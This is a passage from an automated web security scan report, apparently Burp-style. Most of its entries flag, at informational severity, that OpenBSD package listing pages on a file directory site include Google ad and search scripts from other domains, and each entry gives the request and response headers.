Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.90. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ntrpI/Vk2B6ApUr+/wYMJg"
Content-Length: 12981
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/alpha/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.91. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AyywHHTsGb4e3P/0PscWpw"
Content-Length: 22484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.92. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gYhGvw8yDsOFELUImoJsgg"
Content-Length: 12992
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/amd64/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.93. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+T32qb0lEneT8hwdZwNmWQ"
Content-Length: 23043
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.94. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/m68k.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/m68k.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BtrGPS615RcgSd2zfxnuNg"
Content-Length: 12886
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/m68k/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.95. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sRJNXt2YnEvJFMxJ8cr0wA"
Content-Length: 22283
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.96. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RwmybENk8AYckfLAmCSvYQ"
Content-Length: 12940
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.97. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8uwFEp9EFUfqNRxJeVtUQQ"
Content-Length: 22490
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.98. http://dir.filewatcher.com/d/OpenBSD/4.1.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tTMqSJFldywaUyEtPM5P7Q"
Content-Length: 5522
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.99. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/kjdze4x41CPe5TuJm7UeQ"
Content-Length: 13066
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/alpha/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.100. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7VuYOQlGD9x2GFM1KZWiog"
Content-Length: 20401
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.101. http://dir.filewatcher.com/d/OpenBSD/4.1/i386.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BUp4cKcoevIhEW5t1rWQcA"
Content-Length: 13011
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.102. http://dir.filewatcher.com/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wlm683WbAi037RAQWrT8VA"
Content-Length: 22662
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.103. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/mips64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/mips64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/KZHP9k6deDcKA/RRtTPpA"
Content-Length: 13080
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/mips64/</title>
</h
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.104. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IhWg+v1MTAtlwa1SgiETQw"
Content-Length: 22652
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.105. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vCza/GTygI3RkLITplJYdA"
Content-Length: 12981
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

